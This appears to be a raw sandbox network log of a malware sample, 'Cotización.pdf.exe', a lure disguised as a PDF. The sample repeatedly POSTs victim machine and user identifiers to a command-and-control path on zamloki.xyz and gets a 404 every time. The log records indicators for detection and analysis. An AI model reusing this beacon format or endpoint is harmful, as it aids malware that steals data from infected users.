                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    116 | 192.168.2.3 | 49855 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:56.175477982 CEST | 5698 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:56.195302963 CEST | 5698 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:56.460179090 CEST | 5699 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=os2bal99QEHu7Ibz4V7A9Tm0kaYM1NRmZiKfd721xZBt6F9oV%2BhyMLaRF0eOa305tXyJfrunPQ03yF4J6N1%2F%2Fci83AuNF%2B0UgGWgvw%2Bcsfz74bWkyR5DkUUOLyZf6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550292a134a85-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    117 | 192.168.2.3 | 49856 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:56.689730883 CEST | 5700 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:56.708532095 CEST | 5700 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:56.957372904 CEST | 5701 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jyl3k3XHkbK0n3yzQpF755%2F7SNLj4RtzwU%2BMHBYHM9UYs1OPVYWO%2BzAikkvtFBHH7mk%2Bm%2FC6ufq1AIGHBrb5ytjwWT46pX1atPKJUrSbnKPR%2BK%2F1Vds3AtFBc7ij3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725502c69d42b95-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    118 | 192.168.2.3 | 49857 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:57.212747097 CEST | 5702 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:57.232525110 CEST | 5702 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:57.479842901 CEST | 5703 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ERCFVJHPp64B6DEl9Ey%2B4JkldEkfl%2FzF9oRtt%2BisD6VkOM7RPfgjI0BlSVHrUqGFGBuNYeXGV5LEVMROwihGyCAfadPJnYVL5rxiEAS5S033uW6kLHcPxEgBrZ%2BNZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725502fad7b6449-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    119 | 192.168.2.3 | 49858 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:57.699676991 CEST | 5704 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:57.717665911 CEST | 5704 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:57.952822924 CEST | 5705 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ETYUoRY8H6PKlywJ%2B359WOCoPQ0NOlZezBlQZZ7tjgpsy1t56hVKgyj0PB%2FPORYx9Rovngw0B7cEl4ChyjrnMVEzciN%2FT6KN9oJKqGZUm9%2FJ5PjFtZihv5H9dzTuQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255032aad5145a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    12 | 192.168.2.3 | 49740 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:54.635314941 CEST | 1299 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:54.655654907 CEST | 1300 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:54.908283949 CEST | 1300 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z6lr9YrRM8RVkj2NevDdqKhWMU1PPtYaZq7BOsqWw6p1COL%2BBBsDUk94wFaA6fZdnSn0%2FldLcH3orHYeG8W%2FU5eZtsJiNYl86sZNA%2FSPMrVQ1F1%2Bl41bt7gs1UIpUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ea88a0d1776-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    120 | 192.168.2.3 | 49859 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:58.192042112 CEST | 5706 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:58.213493109 CEST | 5706 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:58.470221996 CEST | 5707 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lezyi%2BQ6vCnZBlgZYDJjr1CeBBEbH3EHOh2X7%2F5yYC8TWhcIxJ40LJuXzDakid5QYqr7ixTP8xL6CqRaRUH3B0ZCVyN7pM1%2FD%2BCAljTEPCLyeMGxYRDs2mDhvHPqiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255035caeac2c7-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    121 | 192.168.2.3 | 49860 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:58.763149023 CEST | 5708 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:58.784677982 CEST | 5708 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:59.031637907 CEST | 5709 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zuCsMsQhmLNSfJ8u9HbsiVoOVNfUE8YQHNzhtwAa7Qkx3Vz6PSEWepUJ5QjKEWVYLksi00pTXomKcx4x7VLpTLqB%2BPgBDZqha4HXovJ%2BVg4CXgCBJ5rh%2BpOWB%2B56FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725503959014e92-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    122 | 192.168.2.3 | 49861 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:59.310832024 CEST | 5709 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:59.330698967 CEST | 5710 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:59.621309042 CEST | 5710 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JN7V1q3kToggtZIFXysfhcV4KjsIyvue32dsaedduKYcu3LyqC9Gv9qOtpQp3PdRI0XM3OFUSgI7SRnnJ1BXHFIgVwAmfUptT3k%2F4vbeu3aTd7%2BbbBMS18b%2BMWbvcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725503ccf67c2ae-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    123 | 192.168.2.3 | 49862 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:59.884037018 CEST | 5711 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:59.901774883 CEST | 5712 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:00.228636026 CEST | 5712 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KZF5b8mRQyRD%2BD2EyvSUpw5ryW4Yj1yy6FtttVFI7GbSza7hOqe3Z44lFEEllpBwMt5f8SNrIUDTwC5AEjUNmu7fqFF3Pxt17CmhFyuIbPVmTgUT5L2irQnhwLHGdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550405f31dfb7-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    124 | 192.168.2.3 | 49863 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:00.477509022 CEST | 5713 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:00.497545004 CEST | 5713 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:00.758980989 CEST | 5714 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PNOLoCRetRMZ4VDLoE%2BfebkT9uxyZ5v0JJS2Bn1iton2M%2FP2rnAZD16U2CILGXHuDdF4jZUpvvZg9ow6%2BF3Vfa6iVOXiys%2FNMqcyrpAzlDqt%2BvcYX9c9bnr1Uq0v%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550441d76beec-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    125 | 192.168.2.3 | 49864 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:01.003475904 CEST | 5715 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:01.021481037 CEST | 5715 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:01.386045933 CEST | 5716 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O31d3Zw8KI%2BG%2FKJyUKOoEzk4IvEMq0GNkpsApuc7ZcegtmRF0JjutbP0MLp7sF%2FUO8lkdt3eOMn1n3SQDFadO8%2Fj%2BZXI9l8mMyWok4x7lP4b118l%2FFoD%2FsBnKoj3yw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725504758c86341-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    126 | 192.168.2.3 | 49865 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:01.658268929 CEST | 5717 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:01.678421974 CEST | 5717 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:01.929090023 CEST | 5718 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9LGwY%2BkT%2FylNJvGu%2Bps80X8SvGEormONXENmJYkJEJ%2B4OxBT2ZYqoCCTZcu5yoKtknrtmGFZ2QWhRlkeHQ0UvuptUcMKwwsqQ8NR%2BARkejAjrmGxXOssZ%2F9s1LuhOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725504b7c8105cc-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    127 | 192.168.2.3 | 49866 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:02.174887896 CEST | 5719 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:03:02.192684889 CEST | 5719 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:03:02.470159054 CEST | 5720 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:03:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ua1fshFzs6bw%2F%2BZdzYSl2g3lfKYNj0AuMQzMfbgLIVQi5i4q5tOEtQzR5xhD8fwe6FAwhKtR%2FPE1qty3JLggP2QOo9YiK%2FWR72%2Bmpi0O2TEKgfhZiIsMJSNsg4FL7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725504ead6f4abd-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    128 | 192.168.2.3 | 49867 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:03:02.778872967 CEST | 5721 | OUT | POST /des/co/tox.php HTTP/1.0
